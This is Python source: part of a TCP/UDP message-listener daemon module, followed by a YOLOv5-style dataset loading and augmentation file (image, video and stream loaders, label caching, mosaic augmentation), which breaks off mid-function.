self._p = multiprocessing.Process(
target=self.run, args=(self._notifyQ,))
self._p.start()
def stop(self) -> None:
if self._p is not None:
self._p.terminate()
def notify(self, notify: DataLinkNotify) -> None:
self._notifyQ.put_nowait(tuple(notify))
def run(self, notify_q: multiprocessing.Queue) -> None:
# Setup a loop for current thread.
asyncio.set_event_loop(
asyncio.new_event_loop())
try:
asyncio.run(self.datalink_create())
except asyncio.exceptions.CancelledError:
return
    @abc.abstractmethod
async def datalink_create(self) -> None:
"""
Create datalink
"""
class TCPDataLink(DataLink):
PROTO = DataLink.TCP_DATALINK
async def datalink_create(self) -> None:
assert(self._processor is not None)
server = await asyncio.start_server(
self._tcp_datalink_factory, self.host, self.port)
async with server:
self.server = server
await server.serve_forever()
async def _tcp_datalink_factory(self, reader: StreamReader,
writer: StreamWriter) -> None:
while True:
try:
letter = await receving(reader)
await self._processor(self, letter, self._args) # type: ignore
except Exception:
writer.close()
break
class DataLinkProcProtocol(asyncio.DatagramProtocol):
def __init__(self, dl: DataLink, processor: Callable, args: Any) -> None:
self._dl = dl
self._processor = processor
self._args = args
def connection_made(self, transport: asyncio.BaseTransport) -> None:
self._transport = transport
def datagram_received(self, data, addr) -> None:
letter = Letter.parse(data)
self._processor(self._dl, letter, self._args)
class UDPDataLink(DataLink):
PROTO = DataLink.UDP_DATALINK
async def datalink_create(self) -> None:
loop = asyncio.get_running_loop()
transport, proto = await loop.create_datagram_endpoint(
lambda: DataLinkProcProtocol(self, self._processor, self._args),
local_addr=(self.host, self.port)
)
while True:
            if self._p is not None and not self._p.is_alive():
break
await asyncio.sleep(3600)
transport.close()
class DataLinker(ModuleTDaemon):
SUPPORT_PROTOS = {
DataLink.TCP_DATALINK: TCPDataLink,
DataLink.UDP_DATALINK: UDPDataLink
}
def __init__(self) -> None:
# Init as a Thread ModuleDaemon
ModuleTDaemon.__init__(self, M_NAME)
self._links = [] # type: List[DataLink]
self._msgQueue = multiprocessing.Queue(256) \
# type: multiprocessing.Queue[DataLinkNotify]
self._notify_cb = {} # type: Dict[tag, Notifier]
self._isNeedStop = False
def addDataLink(self, host: str, port: int, proto: str,
processor: Callable, args: Any) -> None:
        # Ignore duplicate links.
if self.isLinkExists(host, port, proto):
return None
if proto not in DataLinker.SUPPORT_PROTOS:
raise DATA_LINK_PROTO_NOT_SUPPORT(proto)
dl = DataLinker.SUPPORT_PROTOS[proto](
host, port, processor, args, self._msgQueue)
self._links.append(dl)
def addNotify(self, tag: str, cb: Callable[[Any, Any], None], arg: Any) -> None:
if tag in self._notify_cb:
raise NOTIFIER_IS_ALREADY_EXISTS(tag)
notifier = Notifier(cb, arg)
self._notify_cb[tag] = notifier
def isLinkExists(self, host: str, port: int, proto: str) -> bool:
match = [
dl for dl in self._links
if host == dl.host and port == dl.port and proto == dl.PROTO
]
return len(match) > 0
def start(self) -> None:
threading.Thread.start(self)
def is_alive(self) -> bool:
return threading.Thread.is_alive(self)
def run(self) -> None:
# Start all DataLinks
for dl in self._links:
dl.start()
# Deal with messages from DataLinks.
while True:
try:
tag, msg = self._msgQueue.get(timeout=3)
except multiprocessing.queues.Empty:
if self._isNeedStop is True:
break
continue
if tag not in self._notify_cb:
continue
try:
self._notify_cb[tag].notify(msg)
except Exception:
traceback.print_exc()
# Stop all DataLinks
for dl in self._links:
dl.stop()
def stop(self) -> None:
self._isNeedStop = True
async def begin(self) -> None:
return
async def cleanup(self) -> None:
return
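# Usage sketch (added, not part of the original module; defined but never
# executed): a minimal illustration of how the pieces above fit together.
# The host, port and the "print" tag are arbitrary example values, and the
# processor signature matches what datagram_received()/_tcp_datalink_factory()
# call: processor(datalink, letter, args).
def _datalink_usage_sketch() -> None:
    def processor(dl: DataLink, letter: Any, args: Any) -> None:
        # Runs in the DataLink child process; forward every received letter
        # to the DataLinker's notify queue under the "print" tag.
        dl.notify(DataLinkNotify("print", letter))
    def on_print(msg: Any, arg: Any) -> None:
        # Runs in the DataLinker thread for each notification.
        print("received:", msg)
    linker = DataLinker()
    linker.addDataLink("127.0.0.1", 9000, DataLink.UDP_DATALINK, processor, None)
    linker.addNotify("print", on_print, None)
    linker.start()  # starts the DataLinker thread and all registered links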
|
datasets.py
|
# Dataset utils and dataloaders
import glob
import logging
import math
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import ThreadPool
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
import torch.nn.functional as F
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from .general import xyxy2xywh, xywh2xyxy, xywhn2xyxy, xyn2xy, segment2box, segments2boxes, resample_segments, \
clean_str
from .torch_utils import torch_distributed_zero_first
# Parameters
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff', 'dng', 'webp'] # acceptable image suffixes
vid_formats = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv', 'mkv'] # acceptable video suffixes
logger = logging.getLogger(__name__)
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
    except (AttributeError, KeyError, IndexError):
        pass  # image has no usable EXIF orientation data
return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
rank=-1, world_size=1, workers=8, image_weights=False, quad=False, prefix=''):
    # Make sure only the first process in DDP processes the dataset first, so that the other processes can use the cache
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad,
image_weights=image_weights,
prefix=prefix)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
loader = torch.utils.data.DataLoader if image_weights else InfiniteDataLoader
# Use torch.utils.data.DataLoader() if dataset.properties will update during training else InfiniteDataLoader()
dataloader = loader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn)
return dataloader, dataset
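# Usage sketch (added, not in the original file; never executed): the minimal
# inputs create_dataloader expects. `opt` only needs a `single_cls` attribute
# here; the dataset path, image size and worker count are placeholder example
# values rather than anything taken from this repository.
def _create_dataloader_sketch():
    from types import SimpleNamespace
    opt = SimpleNamespace(single_cls=False)  # stand-in for argparse options
    dataloader, dataset = create_dataloader(
        'data/images/train',          # hypothetical dataset path
        imgsz=640, batch_size=16, stride=32, opt=opt,
        hyp=None, augment=False, rect=True, workers=4)
    for imgs, targets, paths, shapes in dataloader:
        break  # one collated batch: stacked images, concatenated labels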
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler(object):
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
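# Illustrative sketch (added, not part of the original file; never executed):
# how InfiniteDataLoader behaves compared to a plain DataLoader. The wrapped
# batch sampler repeats forever, so the single iterator created in __init__
# (and its worker processes, when num_workers > 0) is reused across epochs
# rather than rebuilt each time, while __len__ still reports one epoch's worth
# of batches. _ToyDataset is just a stand-in for LoadImagesAndLabels.
def _infinite_dataloader_sketch():
    class _ToyDataset(Dataset):
        def __len__(self):
            return 8
        def __getitem__(self, i):
            return torch.tensor([i])
    loader = InfiniteDataLoader(_ToyDataset(), batch_size=4, num_workers=0)
    for _epoch in range(2):
        for _batch in loader:  # 2 batches per pass, same underlying iterator
            pass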
class LoadImages: # for inference
def __init__(self, path, img_size=640, stride=32):
p = str(Path(path).absolute()) # os-agnostic absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception(f'ERROR: {p} does not exist')
images = [x for x in files if x.split('.')[-1].lower() in img_formats]
videos = [x for x in files if x.split('.')[-1].lower() in vid_formats]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.stride = stride
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'image'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, f'No images or videos found in {p}. ' \
f'Supported formats are:\nimages: {img_formats}\nvideos: {vid_formats}'
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print(f'video {self.count + 1}/{self.nf} ({self.frame}/{self.nframes}) {path}: ', end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print(f'image {self.count}/{self.nf} {path}: ', end='')
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
def __init__(self, pipe='0', img_size=640, stride=32):
self.img_size = img_size
self.stride = stride
if pipe.isnumeric():
            pipe = int(pipe)  # local camera index
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, f'Camera Error {self.pipe}'
img_path = 'webcam.jpg'
print(f'webcam {self.count}: ', end='')
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640, stride=32):
self.mode = 'stream'
self.img_size = img_size
self.stride = stride
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = [clean_str(x) for x in sources] # clean source names for later
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print(f'{i + 1}/{n}: {s}... ', end='')
            cap = cv2.VideoCapture(int(s) if s.isnumeric() else s)
assert cap.isOpened(), f'Failed to open {s}'
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(f' success ({w}x{h} at {fps:.2f} FPS).')
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, self.img_size, stride=self.stride)[0].shape for x in self.imgs], 0) # shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, self.img_size, auto=self.rect, stride=self.stride)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
return [x.replace(sa, sb, 1).replace('.' + x.split('.')[-1], '.txt') for x in img_paths]
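# Example of the directory convention img2label_paths assumes (added note,
# POSIX separators shown): the first '/images/' path component is swapped for
# '/labels/' and the image extension for '.txt', e.g.
#   img2label_paths(['data/images/train/0001.jpg'])
#   -> ['data/labels/train/0001.txt']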
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, prefix=''):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
self.path = path
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
# f = list(p.rglob('**/*.*')) # pathlib
elif p.is_file(): # file
with open(p, 'r') as t:
t = t.read().strip().splitlines()
parent = str(p.parent) + os.sep
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
# f += [p.parent / x.lstrip(os.sep) for x in t] # local to global path (pathlib)
else:
raise Exception(f'{prefix}{p} does not exist')
self.img_files = sorted([x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in img_formats])
# self.img_files = sorted([x for x in f if x.suffix[1:].lower() in img_formats]) # pathlib
assert self.img_files, f'{prefix}No images found'
except Exception as e:
raise Exception(f'{prefix}Error loading data from {path}: {e}\nSee {help_url}')
# Check cache
self.label_files = img2label_paths(self.img_files) # labels
cache_path = (p if p.is_file() else Path(self.label_files[0]).parent).with_suffix('.cache') # cached labels
if cache_path.is_file():
cache, exists = torch.load(cache_path), True # load
if cache['hash'] != get_hash(self.label_files + self.img_files) or 'version' not in cache: # changed
cache, exists = self.cache_labels(cache_path, prefix), False # re-cache
else:
cache, exists = self.cache_labels(cache_path, prefix), False # cache
# Display cache
nf, nm, ne, nc, n = cache.pop('results') # found, missing, empty, corrupted, total
if exists:
d = f"Scanning '{cache_path}' for images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupted"
tqdm(None, desc=prefix + d, total=n, initial=n) # display cache results
assert nf > 0 or not augment, f'{prefix}No labels in {cache_path}. Can not train without labels. See {help_url}'
# Read cache
cache.pop('hash') # remove hash
cache.pop('version') # remove version
labels, shapes, self.segments = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.img_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
if single_cls:
for x in self.labels:
x[:, 0] = 0
n = len(shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
self.img_hw0, self.img_hw = [None] * n, [None] * n
results = ThreadPool(8).imap(lambda x: load_image(*x), zip(repeat(self), range(n))) # 8 threads
pbar = tqdm(enumerate(results), total=n)
for i, x in pbar:
self.imgs[i], self.img_hw0[i], self.img_hw[i] = x # img, hw_original, hw_resized = load_image(self, i)
gb += self.imgs[i].nbytes
pbar.desc = f'{prefix}Caching images ({gb / 1E9:.1f}GB)'
def cache_labels(self, path=Path('./labels.cache'), prefix=''):
# Cache dataset labels, check images and read shapes
x = {} # dict
        nm, nf, ne, nc = 0, 0, 0, 0  # number missing, found, empty, corrupted
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for i, (im_file, lb_file) in enumerate(pbar):
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
segments = [] # instance segments
assert (shape[0] > 9) & (shape[1] > 9), f'image size {shape} <10 pixels'
assert im.format.lower() in img_formats, f'invalid image format {im.format}'
# verify labels
if os.path.isfile(lb_file):
nf += 1 # label found
with open(lb_file, 'r') as f:
l = [x.split() for x in f.read().strip().splitlines()]
if any([len(x) > 8 for x in l]): # is segment
classes = np.array([x[0] for x in l], dtype=np.float32)
segments = [np.array(x[1:], dtype=np.float32).reshape(-1, 2) for x in l] # (cls, xy1...)
l = np.concatenate((classes.reshape(-1, 1), segments2boxes(segments)), 1) # (cls, xywh)
l = np.array(l, dtype=np.float32)
if len(l):
assert l.shape[1] == 5, 'labels require 5 columns each'
assert (l >= 0).all(), 'negative labels'
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels'
assert np.unique(l, axis=0).shape[0] == l.shape[0], 'duplicate labels'
else:
ne += 1 # label empty
l = np.zeros((0, 5), dtype=np.float32)
else:
nm += 1 # label missing
l = np.zeros((0, 5), dtype=np.float32)
x[im_file] = [l, shape, segments]
except Exception as e:
nc += 1
print(f'{prefix}WARNING: Ignoring corrupted image and/or label {im_file}: {e}')
pbar.desc = f"{prefix}Scanning '{path.parent / path.stem}' for images and labels... " \
f"{nf} found, {nm} missing, {ne} empty, {nc} corrupted"
if nf == 0:
print(f'{prefix}WARNING: No labels found in {path}. See {help_url}')
x['hash'] = get_hash(self.label_files + self.img_files)
x['results'] = nf, nm, ne, nc, i + 1
x['version'] = 0.1 # cache version
torch.save(x, path) # save for next time
logging.info(f'{prefix}New cache created: {path}')
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index]
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
img, labels = load_mosaic(self, index)
shapes = None
if random.random() < hyp['mixup']:
img2, labels2 = load_mosaic(self, random.randint(0, self.n - 1))
r = np.random.beta(8.0, 8.0)
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
img, (h0, w0), (h, w) = load_image(self, index)
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad)
labels = self.labels[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
if self.augment:
if not mosaic:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
nL = len(labels)
if nL:
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5])
labels[:, [2, 4]] /= img.shape[0]
labels[:, [1, 3]] /= img.shape[1]
if self.augment:
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
img = img[:, :, ::-1].transpose(2, 0, 1)
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
@staticmethod
def collate_fn4(batch):
img, label, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
img4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
ho = torch.tensor([[0., 0, 0, 1, 0, 0]])
wo = torch.tensor([[0., 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, .5, .5, .5, .5]]) # scale
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2., mode='bilinear', align_corners=False)[
0].type(img[i].type())
l = label[i]
else:
im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
l = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
img4.append(im)
label4.append(l)
for i, l in enumerate(label4):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
def hist_equalize(img, clahe=True, bgr=False):
# Equalize histogram on BGR image 'img' with img.shape(n,m,3) and range 0-255
yuv = cv2.cvtColor(img, cv2.COLOR_BGR2YUV if bgr else cv2.COLOR_RGB2YUV)
if clahe:
c = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))
yuv[:, :, 0] = c.apply(yuv[:, :, 0])
else:
yuv[:, :, 0] = cv2.equalizeHist(yuv[:, :, 0]) # equalize Y channel histogram
return cv2.cvtColor(yuv, cv2.COLOR_YUV2BGR if bgr else cv2.COLOR_YUV2RGB) # convert YUV image to RGB
def load_mosaic(self, index):
# loads images in a 4-mosaic
labels4, segments4 = [], []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + [self.indices[random.randint(0, self.n - 1)] for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padw, padh) for x in segments]
labels4.append(labels)
segments4.extend(segments)
# Concat/clip labels
labels4 = np.concatenate(labels4, 0)
for x in (labels4[:, 1:], *segments4):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4 = random_perspective(img4, labels4, segments4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def load_mosaic9(self, index):
# loads images in a 9-mosaic
labels9, segments9 = [], []
s = self.img_size
indices = [index] + [self.indices[random.randint(0, self.n - 1)] for _ in range(8)] # 8 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img9
if i == 0: # center
img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
h0, w0 = h, w
c = s, s, s + w, s + h # xmin, ymin, xmax, ymax (base) coordinates
elif i == 1: # top
c = s, s - h, s + w, s
elif i == 2: # top right
c = s + wp, s - h, s + wp + w, s
elif i == 3: # right
c = s + w0, s, s + w0 + w, s + h
elif i == 4: # bottom right
c = s + w0, s + hp, s + w0 + w, s + hp + h
elif i == 5: # bottom
c = s + w0 - w, s + h0, s + w0, s + h0 + h
elif i == 6: # bottom left
c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
elif i == 7: # left
c = s - w, s + h0 - h, s, s + h0
elif i == 8: # top left
c = s - w, s + h0 - hp - h, s, s + h0 - hp
padx, pady = c[:2]
x1, y1, x2, y2 = [max(x, 0) for x in c] # allocate coords
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padx, pady) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padx, pady) for x in segments]
labels9.append(labels)
segments9.extend(segments)
# Image
img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:] # img9[ymin:ymax, xmin:xmax]
hp, wp = h, w # height, width previous
# Offset
yc, xc = [int(random.uniform(0, s)) for _ in self.mosaic_border] # mosaic center x, y
img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]
# Concat/clip labels
labels9 = np.concatenate(labels9, 0)
labels9[:, [1, 3]] -= xc
labels9[:, [2, 4]] -= yc
c = np.array([xc, yc]) # centers
segments9 = [x - c for x in segments9]
for x in (labels9[:, 1:], *segments9):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img9, labels9 = replicate(img9, labels9) # replicate
# Augment
img9, labels9 = random_perspective(img9, labels9, segments9,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
